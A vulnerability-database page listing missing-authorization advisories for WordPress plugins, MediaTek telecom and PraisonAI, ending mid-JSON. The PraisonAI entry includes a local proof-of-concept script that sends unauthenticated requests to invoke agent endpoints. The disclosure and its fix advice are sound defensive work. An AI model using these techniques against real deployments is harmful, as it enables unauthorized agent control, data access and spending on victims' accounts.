Common Weakness Enumeration

CWE-862

Allowed-with-Review

Missing Authorization

Abstraction: Class · Status: Incomplete

The product does not perform an authorization check when an actor attempts to access a resource or perform an action.

14573 vulnerabilities reference this CWE, most recent first.

GHSA-X7XV-7M65-QGQ2

Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-02-19 18:31
VLAI
Details

The GDPR Cookie Consent plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'gdpr/v1/settings' REST API endpoint in all versions up to, and including, 4.1.2. This makes it possible for unauthenticated attackers to retrieve sensitive plugin settings including API tokens, email addresses, account IDs, and site keys.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-11754"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-19T07:17:26Z",
    "severity": "HIGH"
  },
  "details": "The GDPR Cookie Consent plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the \u0027gdpr/v1/settings\u0027 REST API endpoint in all versions up to, and including, 4.1.2. This makes it possible for unauthenticated attackers to retrieve sensitive plugin settings including API tokens, email addresses, account IDs, and site keys.",
  "id": "GHSA-x7xv-7m65-qgq2",
  "modified": "2026-02-19T18:31:49Z",
  "published": "2026-02-19T18:31:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11754"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/gdpr-cookie-consent/tags/4.0.1/includes/settings/class-gdpr-cookie-consent-api.php#L77"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3443083"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4107362f-ae21-4509-b83a-0bffbde23330?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X82P-683F-3GG5

Vulnerability from github – Published: 2022-02-26 00:00 – Updated: 2022-03-08 00:00
VLAI
Details

In waline 1.6.1, an attacker can submit messages using X-Forwarded-For to forge any IP address.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-24594"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-02-25T12:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In waline 1.6.1, an attacker can submit messages using X-Forwarded-For to forge any IP address.",
  "id": "GHSA-x82p-683f-3gg5",
  "modified": "2022-03-08T00:00:41Z",
  "published": "2022-02-26T00:00:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24594"
    },
    {
      "type": "WEB",
      "url": "https://github.com/walinejs/waline/issues/785"
    },
    {
      "type": "WEB",
      "url": "https://github.com/walinejs/waline/discussions/792"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-X83M-PWR6-93C3

Vulnerability from github – Published: 2025-11-21 15:31 – Updated: 2026-01-20 15:31
VLAI
Details

Missing Authorization vulnerability in Stiofan UsersWP userswp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects UsersWP: from n/a through <= 1.2.47.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-66072"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-21T13:15:48Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in Stiofan UsersWP userswp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects UsersWP: from n/a through \u003c= 1.2.47.",
  "id": "GHSA-x83m-pwr6-93c3",
  "modified": "2026-01-20T15:31:56Z",
  "published": "2025-11-21T15:31:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66072"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/userswp/vulnerability/wordpress-userswp-plugin-1-2-47-broken-access-control-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://vdp.patchstack.com/database/Wordpress/Plugin/userswp/vulnerability/wordpress-userswp-plugin-1-2-47-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X865-Q275-326G

Vulnerability from github – Published: 2024-05-08 15:30 – Updated: 2026-04-28 21:35
VLAI
Details

Missing Authorization vulnerability in EPROLO EPROLO Dropshipping.This issue affects EPROLO Dropshipping: from n/a through 1.7.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-33573"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-08T14:15:08Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in EPROLO EPROLO Dropshipping.This issue affects EPROLO Dropshipping: from n/a through 1.7.1.",
  "id": "GHSA-x865-q275-326g",
  "modified": "2026-04-28T21:35:06Z",
  "published": "2024-05-08T15:30:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-33573"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/eprolo-dropshipping/wordpress-eprolo-dropshipping-plugin-1-7-1-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X873-CFW9-V3QX

Vulnerability from github – Published: 2022-07-07 00:00 – Updated: 2022-07-15 00:00
VLAI
Details

In telecom service, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07044717; Issue ID: ALPS07044708.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-21763"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-07-06T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In telecom service, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07044717; Issue ID: ALPS07044708.",
  "id": "GHSA-x873-cfw9-v3qx",
  "modified": "2022-07-15T00:00:23Z",
  "published": "2022-07-07T00:00:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21763"
    },
    {
      "type": "WEB",
      "url": "https://corp.mediatek.com/product-security-bulletin/July-2022"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X87C-MF44-JQ5F

Vulnerability from github – Published: 2026-01-17 06:30 – Updated: 2026-01-17 06:30
VLAI
Details

The User Registration Using Contact Form 7 plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_cf7_form_data' function in all versions up to, and including, 2.5. This makes it possible for unauthenticated attackers to retrieve form settings which includes Facebook app secrets.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-12825"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-17T05:16:09Z",
    "severity": "MODERATE"
  },
  "details": "The User Registration Using Contact Form 7 plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the \u0027get_cf7_form_data\u0027 function in all versions up to, and including, 2.5. This makes it possible for unauthenticated attackers to retrieve form settings which includes Facebook app secrets.",
  "id": "GHSA-x87c-mf44-jq5f",
  "modified": "2026-01-17T06:30:36Z",
  "published": "2026-01-17T06:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12825"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026old=3433276%40user-registration-using-contact-form-7\u0026new=3433276%40user-registration-using-contact-form-7\u0026sfp_email=\u0026sfph_mail="
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b49978c1-9254-4229-8d32-e12896301f3d?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X8CV-XMQ7-P8XP

Vulnerability from github – Published: 2026-06-18 13:57 – Updated: 2026-06-18 13:57
VLAI
Summary
PraisonAI AgentTeam.launch exposes unauthenticated remote agent listing and invocation endpoints
Details

PraisonAI AgentTeam.launch() exposes unauthenticated remote agent invocation endpoints

Summary

PraisonAI's documented Python AgentTeam.launch() / Agents.launch() HTTP server starts externally reachable agent invocation endpoints without any authentication enforcement.

The current implementation registers GET /{path}/list, POST /{path}, and POST /{path}/{agent_id} routes. The POST routes directly call agent.chat(...). Requests with no Authorization header are accepted, and requests with an obviously wrong bearer token are also accepted. The default Python API bind host for Agents.launch() is 0.0.0.0, and official documentation shows host="0.0.0.0" for remote access.

This is a sibling/incomplete-fix variant of PraisonAI's prior unauthenticated API server and call server advisory family. Nearby server surfaces were hardened to require tokens, fail closed, or bind locally by default, but the AgentTeam.launch() FastAPI path still exposes unauthenticated agent execution on current upstream main and the latest release.

This report is scoped to the Python AgentTeam.launch() / Agents.launch() route-registration path. It does not require adjudicating whether the separate praisonai serve agents --api-key CLI path is correctly enforced.

Affected Components

  • Package: praisonaiagents
  • Current upstream main tested: 2f9677abb2ea68eab864ee8b6a828fd0141612e1
  • Latest release tag tested: v4.6.57
  • Primary file: src/praisonai-agents/praisonaiagents/agents/agents.py
  • Current line references: AgentTeam.launch() begins at line 1923; the group POST route is registered at line 2007; the group handler invokes agent_instance.chat(...) at line 2042; the unauthenticated list route is registered at line 2086; per-agent handlers invoke agent.chat(...) at line 2117.
  • Primary class/API: AgentTeam.launch() / exported alias Agents
  • Affected routes:
  • GET /{path}/list: lists deployed agents.
  • POST /{path}: sequentially invokes all agents in the team.
  • POST /{path}/{agent_id}: invokes a specific agent.

Current vulnerable sink:

@app.post(path)
async def handle_query(request: Request, query_data: Optional[AgentQuery] = None):
    ...
    response = await loop.run_in_executor(
        None,
        copy_context_to_callable(lambda ci=current_input: agent_instance.chat(ci)),
    )

Per-agent sink:

app.post(agent_path)(create_agent_handler(agent_instance))
...
response = await loop.run_in_executor(
    None,
    copy_context_to_callable(lambda q=query: agent.chat(q)),
)

List endpoint:

@app.get(f"{path}/list")
async def list_agents():
    return {"agents": [{"name": agent.display_name, "id": ...} for agent in self.agents]}

There is no middleware, dependency, token comparison, bearer-token parsing, API-key check, or startup fail-closed guard in this launch path.

Security Boundary

This is not a trust-model-only report. PraisonAI's own current security documentation says API servers were hardened so that anonymous requests return 401 and API servers bind to 127.0.0.1 by default after the prior unauthenticated API advisory family.

The codebase also contains hardened sibling implementations:

  • praisonai.deploy.api now has AUTH_ENABLED, PRAISONAI_API_TOKEN, generated tokens, and 401 Unauthorized checks (src/praisonai/praisonai/deploy/api.py lines 44-62 and 69-97).
  • praisonai.gateway.server.WebSocketGateway validates external bind safety, requires a token for external binds, checks bearer/query/cookie auth, and validates WebSocket auth (src/praisonai/praisonai/gateway/server.py lines 328-424).
  • praisonai call hardening is documented as requiring CALL_SERVER_TOKEN or explicit opt-out.

AgentTeam.launch() remains outside those shared controls even though it exposes the same class of network-facing agent invocation surface.

Local-Only Reproduction

Run the local-only PoV script below with current source on PYTHONPATH:

PYTHONPATH="/path/to/PraisonAI/src/praisonai-agents:/path/to/PraisonAI/src/praisonai" \
  python poc_agentteam_launch_unauth.py

Expected vulnerable result:

[poc] HIT: unauthenticated clients invoked AgentTeam endpoints

Observed on current upstream main:

{
  "results": [
    {
      "body": {
        "agents": [
          {
            "id": "pov_agent",
            "name": "pov_agent"
          }
        ]
      },
      "case": "no_auth_list",
      "method": "GET",
      "path": "/agents/list",
      "status": 200
    },
    {
      "case": "no_auth_group",
      "method": "POST",
      "path": "/agents",
      "status": 200,
      "body": {
        "final_response": "POV_UNAUTH_AGENTTEAM_EXECUTED:marker",
        "query": "marker",
        "results": [
          {
            "agent": "pov_agent",
            "response": "POV_UNAUTH_AGENTTEAM_EXECUTED:marker"
          }
        ]
      }
    },
    {
      "case": "wrong_bearer_group",
      "method": "POST",
      "path": "/agents",
      "status": 200,
      "body": {
        "final_response": "POV_UNAUTH_AGENTTEAM_EXECUTED:marker",
        "query": "marker",
        "results": [
          {
            "agent": "pov_agent",
            "response": "POV_UNAUTH_AGENTTEAM_EXECUTED:marker"
          }
        ]
      }
    },
    {
      "case": "no_auth_per_agent",
      "method": "POST",
      "path": "/agents/pov_agent",
      "status": 200,
      "body": {
        "agent": "pov_agent",
        "query": "marker",
        "response": "POV_UNAUTH_AGENTTEAM_EXECUTED:marker"
      }
    }
  ]
}

The PoV binds to 127.0.0.1, uses a randomly selected local port, stubs agent.chat() to avoid any external LLM provider, and sends only local HTTP requests.

Standalone PoV script:

#!/usr/bin/env python3
"""
Local-only PoV for PRAI-CAND-003.

Starts a PraisonAI AgentTeam/Agents HTTP server on 127.0.0.1 with a stubbed
agent response, then proves both the group endpoint and per-agent endpoint
execute without authentication. No model provider or external network is used.
"""

import json
import socket
import time
import types
import threading
from contextlib import closing

import requests
from praisonaiagents import Agent, Agents


def _free_port() -> int:
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
        sock.bind(("127.0.0.1", 0))
        return sock.getsockname()[1]


def main() -> int:
    port = _free_port()

    agent = Agent(
        name="pov_agent",
        role="tester",
        goal="test",
        backstory="test",
        llm=None,
    )

    def stub_chat(self, query, *args, **kwargs):
        return f"POV_UNAUTH_AGENTTEAM_EXECUTED:{query}"

    agent.chat = types.MethodType(stub_chat, agent)
    team = Agents(agents=[agent])
    launch_thread = threading.Thread(
        target=lambda: team.launch(path="/agents", port=port, host="127.0.0.1", debug=False),
        daemon=True,
    )
    launch_thread.start()

    base = f"http://127.0.0.1:{port}"
    for _ in range(40):
        try:
            response = requests.get(base + "/health", timeout=0.25)
            if response.status_code == 200:
                break
        except Exception:
            time.sleep(0.1)
    else:
        raise SystemExit("[poc] MISS: server did not start")

    cases = [
        ("no_auth_list", "GET", {}, "/agents/list", None),
        ("no_auth_group", "POST", {}, "/agents", {"query": "marker"}),
        (
            "wrong_bearer_group",
            "POST",
            {"Authorization": "Bearer definitely-wrong"},
            "/agents",
            {"query": "marker"},
        ),
        ("no_auth_per_agent", "POST", {}, "/agents/pov_agent", {"query": "marker"}),
    ]
    results = []
    for name, method, headers, path, body in cases:
        if method == "GET":
            response = requests.get(base + path, headers=headers, timeout=5)
        else:
            response = requests.post(base + path, json=body, headers=headers, timeout=5)
        try:
            body = response.json()
        except Exception:
            body = response.text
        results.append(
            {
                "case": name,
                "method": method,
                "path": path,
                "status": response.status_code,
                "body": body,
            }
        )

    print(json.dumps({"port": port, "results": results}, indent=2, sort_keys=True))

    expected_marker = "POV_UNAUTH_AGENTTEAM_EXECUTED:marker"
    for result in results:
        if result["status"] != 200:
            raise SystemExit(f"[poc] MISS: {result['case']} returned {result['status']}")
        if result["case"] == "no_auth_list" and "pov_agent" not in json.dumps(result["body"]):
            raise SystemExit("[poc] MISS: unauthenticated list endpoint did not expose agent id")
        if result["case"] == "no_auth_list":
            continue
        body_text = json.dumps(result["body"], sort_keys=True)
        if expected_marker not in body_text:
            raise SystemExit(f"[poc] MISS: marker absent for {result['case']}")

    print("[poc] HIT: unauthenticated clients invoked AgentTeam endpoints")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())

Impact

If an operator follows the documented remote-server pattern and exposes an AgentTeam.launch() server on a reachable interface, any network client can invoke the deployed agents without credentials.

Depending on the deployed agents, an unauthenticated caller may be able to:

  • enumerate available agent IDs and names through GET /{path}/list;
  • trigger model/API spend by repeatedly invoking agents;
  • drive agents connected to local tools, internal APIs, SaaS integrations, browsers, files, or workflow actions;
  • trigger side effects through per-agent endpoints even if the operator expected only the team endpoint to be used;
  • access responses generated from connected private context, memory, or knowledge sources.

The impact is deployment-dependent, but the missing access control is in the framework's advertised network server path rather than in user application code.

Affected-Version Sweep

Static sweep of release tags shows the unauthenticated AgentTeam.launch() handler and per-agent registration present in:

  • v4.6.33
  • v4.6.39
  • v4.6.40
  • v4.6.56
  • v4.6.57

The issue remains present on current upstream main 2f9677abb2ea68eab864ee8b6a828fd0141612e1.

The generated deploy API path was hardened between v4.6.33 and v4.6.39, and remains hardened in v4.6.57. This supports the incomplete-fix/sibling-callsite classification: the fix did not cover AgentTeam.launch().

Root Cause

The AgentTeam.launch() FastAPI server is implemented as an independent route-registration path. It does not reuse the hardened API server authentication helper, the gateway bind-aware auth guard, or a shared server-auth policy.

The security-sensitive action is direct invocation of agent.chat() from a network request. The route has no access-control check before that call.

Suggested Fix

Recommended approach:

  1. Add a shared authentication helper for all network-facing agent invocation servers.
  2. Make AgentTeam.launch() fail closed for non-loopback binds unless a token/API key is configured.
  3. Require Authorization: Bearer <token> or an explicit documented API-key header for POST /{path}, GET /{path}/list, and POST /{path}/{agent_id}.
  4. Default AgentTeam.launch() to host="127.0.0.1" unless an explicit unsafe/remote option plus auth is configured.
  5. Add regression tests proving:
  6. no token returns 401;
  7. wrong token returns 403;
  8. correct token can list agents;
  9. correct token can invoke the team endpoint;
  10. correct token can invoke the per-agent endpoint;
  11. external bind without auth fails at startup.

If unauthenticated local development remains supported, require loopback binding and a loud explicit unsafe opt-out for externally bound unauthenticated servers.

Severity

Recommended severity: Critical

Rationale:

  • Network attack vector: the documented server supports remote access via 0.0.0.0.
  • Low complexity: a single POST request invokes the agent.
  • No privileges: no credentials are required.
  • No user interaction: once the server is exposed, the attacker directly sends requests.
  • High confidentiality/integrity/availability impact depends on deployed agents and connected tools, but this is the same agent-control class as prior PraisonAI unauthenticated API advisories. The official remote-agent documentation explicitly discusses remote agents with tools, memory, knowledge, and auth headers, so the security-relevant configuration is not hypothetical.

If maintainers want to score based only on minimal agents with no tools and no private context, the lower-bound impact would still include unauthorized remote invocation and model/API spend.

Notes

The direct single-agent Agent.launch() path in current source appears to share the same missing-auth design, but it raises NameError: name '_server_lock' is not defined before serving in the tested local source checkout. This report therefore makes the primary impact claim only for the confirmed working AgentTeam.launch() / Agents.launch() path.

The CLI praisonai serve agents surface advertises a --api-key option and should be reviewed by maintainers when applying a shared fix, but this submission does not depend on a CLI-specific bypass claim.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "praisonaiagents"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.59"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T13:57:32Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "# PraisonAI `AgentTeam.launch()` exposes unauthenticated remote agent invocation endpoints\n\n## Summary\n\nPraisonAI\u0027s documented Python `AgentTeam.launch()` / `Agents.launch()` HTTP server starts externally reachable agent invocation endpoints without any authentication enforcement.\n\nThe current implementation registers `GET /{path}/list`, `POST /{path}`, and `POST /{path}/{agent_id}` routes. The POST routes directly call `agent.chat(...)`. Requests with no `Authorization` header are accepted, and requests with an obviously wrong bearer token are also accepted. The default Python API bind host for `Agents.launch()` is `0.0.0.0`, and official documentation shows `host=\"0.0.0.0\"` for remote access.\n\nThis is a sibling/incomplete-fix variant of PraisonAI\u0027s prior unauthenticated API server and call server advisory family. Nearby server surfaces were hardened to require tokens, fail closed, or bind locally by default, but the `AgentTeam.launch()` FastAPI path still exposes unauthenticated agent execution on current upstream main and the latest release.\n\nThis report is scoped to the Python `AgentTeam.launch()` / `Agents.launch()` route-registration path. It does not require adjudicating whether the separate `praisonai serve agents --api-key` CLI path is correctly enforced.\n\n## Affected Components\n\n- Package: `praisonaiagents`\n- Current upstream main tested: `2f9677abb2ea68eab864ee8b6a828fd0141612e1`\n- Latest release tag tested: `v4.6.57`\n- Primary file: `src/praisonai-agents/praisonaiagents/agents/agents.py`\n- Current line references: `AgentTeam.launch()` begins at line 1923;\n  the group `POST` route is registered at line 2007; the group handler invokes\n  `agent_instance.chat(...)` at line 2042; the unauthenticated list route is\n  registered at line 2086; per-agent handlers invoke `agent.chat(...)` at line\n  2117.\n- Primary class/API: `AgentTeam.launch()` / exported alias `Agents`\n- Affected routes:\n  - `GET /{path}/list`: lists deployed agents.\n  - `POST /{path}`: sequentially invokes all agents in the team.\n  - `POST /{path}/{agent_id}`: invokes a specific agent.\n\nCurrent vulnerable sink:\n\n```python\n@app.post(path)\nasync def handle_query(request: Request, query_data: Optional[AgentQuery] = None):\n    ...\n    response = await loop.run_in_executor(\n        None,\n        copy_context_to_callable(lambda ci=current_input: agent_instance.chat(ci)),\n    )\n```\n\nPer-agent sink:\n\n```python\napp.post(agent_path)(create_agent_handler(agent_instance))\n...\nresponse = await loop.run_in_executor(\n    None,\n    copy_context_to_callable(lambda q=query: agent.chat(q)),\n)\n```\n\nList endpoint:\n\n```python\n@app.get(f\"{path}/list\")\nasync def list_agents():\n    return {\"agents\": [{\"name\": agent.display_name, \"id\": ...} for agent in self.agents]}\n```\n\nThere is no middleware, dependency, token comparison, bearer-token parsing, API-key check, or startup fail-closed guard in this launch path.\n\n## Security Boundary\n\nThis is not a trust-model-only report. PraisonAI\u0027s own current security documentation says API servers were hardened so that anonymous requests return `401` and API servers bind to `127.0.0.1` by default after the prior unauthenticated API advisory family.\n\nThe codebase also contains hardened sibling implementations:\n\n- `praisonai.deploy.api` now has `AUTH_ENABLED`, `PRAISONAI_API_TOKEN`, generated tokens, and `401 Unauthorized` checks (`src/praisonai/praisonai/deploy/api.py` lines 44-62 and 69-97).\n- `praisonai.gateway.server.WebSocketGateway` validates external bind safety, requires a token for external binds, checks bearer/query/cookie auth, and validates WebSocket auth (`src/praisonai/praisonai/gateway/server.py` lines 328-424).\n- `praisonai call` hardening is documented as requiring `CALL_SERVER_TOKEN` or explicit opt-out.\n\n`AgentTeam.launch()` remains outside those shared controls even though it exposes the same class of network-facing agent invocation surface.\n\n## Local-Only Reproduction\n\nRun the local-only PoV script below with current source on `PYTHONPATH`:\n\n```bash\nPYTHONPATH=\"/path/to/PraisonAI/src/praisonai-agents:/path/to/PraisonAI/src/praisonai\" \\\n  python poc_agentteam_launch_unauth.py\n```\n\nExpected vulnerable result:\n\n```text\n[poc] HIT: unauthenticated clients invoked AgentTeam endpoints\n```\n\nObserved on current upstream main:\n\n```json\n{\n  \"results\": [\n    {\n      \"body\": {\n        \"agents\": [\n          {\n            \"id\": \"pov_agent\",\n            \"name\": \"pov_agent\"\n          }\n        ]\n      },\n      \"case\": \"no_auth_list\",\n      \"method\": \"GET\",\n      \"path\": \"/agents/list\",\n      \"status\": 200\n    },\n    {\n      \"case\": \"no_auth_group\",\n      \"method\": \"POST\",\n      \"path\": \"/agents\",\n      \"status\": 200,\n      \"body\": {\n        \"final_response\": \"POV_UNAUTH_AGENTTEAM_EXECUTED:marker\",\n        \"query\": \"marker\",\n        \"results\": [\n          {\n            \"agent\": \"pov_agent\",\n            \"response\": \"POV_UNAUTH_AGENTTEAM_EXECUTED:marker\"\n          }\n        ]\n      }\n    },\n    {\n      \"case\": \"wrong_bearer_group\",\n      \"method\": \"POST\",\n      \"path\": \"/agents\",\n      \"status\": 200,\n      \"body\": {\n        \"final_response\": \"POV_UNAUTH_AGENTTEAM_EXECUTED:marker\",\n        \"query\": \"marker\",\n        \"results\": [\n          {\n            \"agent\": \"pov_agent\",\n            \"response\": \"POV_UNAUTH_AGENTTEAM_EXECUTED:marker\"\n          }\n        ]\n      }\n    },\n    {\n      \"case\": \"no_auth_per_agent\",\n      \"method\": \"POST\",\n      \"path\": \"/agents/pov_agent\",\n      \"status\": 200,\n      \"body\": {\n        \"agent\": \"pov_agent\",\n        \"query\": \"marker\",\n        \"response\": \"POV_UNAUTH_AGENTTEAM_EXECUTED:marker\"\n      }\n    }\n  ]\n}\n```\n\nThe PoV binds to `127.0.0.1`, uses a randomly selected local port, stubs `agent.chat()` to avoid any external LLM provider, and sends only local HTTP requests.\n\nStandalone PoV script:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nLocal-only PoV for PRAI-CAND-003.\n\nStarts a PraisonAI AgentTeam/Agents HTTP server on 127.0.0.1 with a stubbed\nagent response, then proves both the group endpoint and per-agent endpoint\nexecute without authentication. No model provider or external network is used.\n\"\"\"\n\nimport json\nimport socket\nimport time\nimport types\nimport threading\nfrom contextlib import closing\n\nimport requests\nfrom praisonaiagents import Agent, Agents\n\n\ndef _free_port() -\u003e int:\n    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:\n        sock.bind((\"127.0.0.1\", 0))\n        return sock.getsockname()[1]\n\n\ndef main() -\u003e int:\n    port = _free_port()\n\n    agent = Agent(\n        name=\"pov_agent\",\n        role=\"tester\",\n        goal=\"test\",\n        backstory=\"test\",\n        llm=None,\n    )\n\n    def stub_chat(self, query, *args, **kwargs):\n        return f\"POV_UNAUTH_AGENTTEAM_EXECUTED:{query}\"\n\n    agent.chat = types.MethodType(stub_chat, agent)\n    team = Agents(agents=[agent])\n    launch_thread = threading.Thread(\n        target=lambda: team.launch(path=\"/agents\", port=port, host=\"127.0.0.1\", debug=False),\n        daemon=True,\n    )\n    launch_thread.start()\n\n    base = f\"http://127.0.0.1:{port}\"\n    for _ in range(40):\n        try:\n            response = requests.get(base + \"/health\", timeout=0.25)\n            if response.status_code == 200:\n                break\n        except Exception:\n            time.sleep(0.1)\n    else:\n        raise SystemExit(\"[poc] MISS: server did not start\")\n\n    cases = [\n        (\"no_auth_list\", \"GET\", {}, \"/agents/list\", None),\n        (\"no_auth_group\", \"POST\", {}, \"/agents\", {\"query\": \"marker\"}),\n        (\n            \"wrong_bearer_group\",\n            \"POST\",\n            {\"Authorization\": \"Bearer definitely-wrong\"},\n            \"/agents\",\n            {\"query\": \"marker\"},\n        ),\n        (\"no_auth_per_agent\", \"POST\", {}, \"/agents/pov_agent\", {\"query\": \"marker\"}),\n    ]\n    results = []\n    for name, method, headers, path, body in cases:\n        if method == \"GET\":\n            response = requests.get(base + path, headers=headers, timeout=5)\n        else:\n            response = requests.post(base + path, json=body, headers=headers, timeout=5)\n        try:\n            body = response.json()\n        except Exception:\n            body = response.text\n        results.append(\n            {\n                \"case\": name,\n                \"method\": method,\n                \"path\": path,\n                \"status\": response.status_code,\n                \"body\": body,\n            }\n        )\n\n    print(json.dumps({\"port\": port, \"results\": results}, indent=2, sort_keys=True))\n\n    expected_marker = \"POV_UNAUTH_AGENTTEAM_EXECUTED:marker\"\n    for result in results:\n        if result[\"status\"] != 200:\n            raise SystemExit(f\"[poc] MISS: {result[\u0027case\u0027]} returned {result[\u0027status\u0027]}\")\n        if result[\"case\"] == \"no_auth_list\" and \"pov_agent\" not in json.dumps(result[\"body\"]):\n            raise SystemExit(\"[poc] MISS: unauthenticated list endpoint did not expose agent id\")\n        if result[\"case\"] == \"no_auth_list\":\n            continue\n        body_text = json.dumps(result[\"body\"], sort_keys=True)\n        if expected_marker not in body_text:\n            raise SystemExit(f\"[poc] MISS: marker absent for {result[\u0027case\u0027]}\")\n\n    print(\"[poc] HIT: unauthenticated clients invoked AgentTeam endpoints\")\n    return 0\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(main())\n```\n\n## Impact\n\nIf an operator follows the documented remote-server pattern and exposes an `AgentTeam.launch()` server on a reachable interface, any network client can invoke the deployed agents without credentials.\n\nDepending on the deployed agents, an unauthenticated caller may be able to:\n\n- enumerate available agent IDs and names through `GET /{path}/list`;\n- trigger model/API spend by repeatedly invoking agents;\n- drive agents connected to local tools, internal APIs, SaaS integrations, browsers, files, or workflow actions;\n- trigger side effects through per-agent endpoints even if the operator expected only the team endpoint to be used;\n- access responses generated from connected private context, memory, or knowledge sources.\n\nThe impact is deployment-dependent, but the missing access control is in the framework\u0027s advertised network server path rather than in user application code.\n\n## Affected-Version Sweep\n\nStatic sweep of release tags shows the unauthenticated `AgentTeam.launch()` handler and per-agent registration present in:\n\n- `v4.6.33`\n- `v4.6.39`\n- `v4.6.40`\n- `v4.6.56`\n- `v4.6.57`\n\nThe issue remains present on current upstream main `2f9677abb2ea68eab864ee8b6a828fd0141612e1`.\n\nThe generated deploy API path was hardened between `v4.6.33` and `v4.6.39`, and remains hardened in `v4.6.57`. This supports the incomplete-fix/sibling-callsite classification: the fix did not cover `AgentTeam.launch()`.\n\n## Root Cause\n\nThe `AgentTeam.launch()` FastAPI server is implemented as an independent route-registration path. It does not reuse the hardened API server authentication helper, the gateway bind-aware auth guard, or a shared server-auth policy.\n\nThe security-sensitive action is direct invocation of `agent.chat()` from a network request. The route has no access-control check before that call.\n\n## Suggested Fix\n\nRecommended 